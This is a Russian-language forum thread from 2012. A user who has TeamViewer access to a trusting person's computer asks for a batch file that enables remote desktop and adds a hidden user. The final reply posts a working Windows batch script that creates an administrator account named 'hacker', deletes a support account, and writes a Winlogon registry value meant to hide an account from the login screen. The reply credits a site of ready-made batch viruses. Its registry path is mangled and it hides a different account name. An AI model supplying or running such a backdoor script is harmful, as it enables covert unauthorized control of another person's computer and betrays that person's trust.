помогите пожалуйста!!!

Discussion in 'Безопасность и Анонимность' started by Serrg, 30 Jan 2012.

1. Serrg

Serrg Elder - Старейшина

Reputations:
    13
    всем добрый день, мне нужен ваш совет или инструкция. Дело в том что у меня есть доступ к компьютеру человека через теам вивер, он мне доверяет.. Вообщем и кароче: есть ли батник который открывает удаленный рабочий стол и добовляет скрытого пользователя.. Приму любые советы, сразу скажу в гуугле не искал, в данный момент на работе на сутках... Поэтому если не трудно кому то, можете написать как сделать.. За любой хороший совет, кроме совета поищи в гуггле :)) поставлю плюсики.. Вем спасибо, с уважением Сергей..

2. Чакэ

Чакэ Elder - Старейшина

Reputations:
    62
    при чем тут ветка о статьях?

3. Serrg

Serrg Elder - Старейшина

Reputations:
    13
    простите пожалуйста, глубоко извеняюсь... Мне очень жаль что не там написал, ни какие корыстные цели не приследовал... Переместите пожалуйста, еще раз извините..

4. StopFreeLife

StopFreeLife Elder - Старейшина

Reputations:
    41
    хорошо подумай перед тем как создавать тему, еще лучше подумай перед тем как писать что не искал, если не искал единственный благоразумный совет будет "поищите ", кто ищет тот находит, а если не нашли создайте тему в разделе который соответствует и опишите проблему, тут я не вижу ни попытки найти ни целей.
    С уважением, Я.

P.S. + - это не валюта , а благодарность за умный пост или ответ, и большинство людей на форуме относятся к ним параллельно, и помогают не поэтому, а потому что хотят или могут.

1 person likes this.
  5. Serrg

Serrg Elder - Старейшина

Reputations:
    13
    спасибо стопфреелайт, поищу.. Честно ) просто ступил что то..
    З.Ы я знаю что плюсики это не валюта, поэтому я написал что за хороший ответ поставлю плюс.. Извините надобыло написать так "за хороший ответ в качестве благодарности поставлю плюс"

6. DooD

DooD Elder - Старейшина

Reputations:
    288
    на счет именно удаленного стола не знаю.А вот через телнет есть,сокрытие учетки также возможно.Пример выкладывал в видео разделе,можешь посмотреть.

7. Serrg

Serrg Elder - Старейшина

Reputations:
    13
    спасибо ДооД.. Вообще правильно сказал стопфреелайф, стоило мне сначало поискать, а потом уже лезть с просьбами... Всем спасибо, если не найду хотя врятли не найду... То спрошу уже у вас..

1 person likes this.
  8. GizmoSB

GizmoSB New Member

Reputations:
    0
    Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

@echo off
    chcp 1251
    net user SUPPORT_388945a0 /delete
    net user hacker hack /add
    net localgroup Администраторы hacker /add
    net localgroup Пользователи SUPPORT_388945a0 /del
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

взял отсюда
    __site-pro-vse.3dn.ru/publ/vsjo_o_virusakh/gotovye_bat_virusy/2-1-0-9

Loading...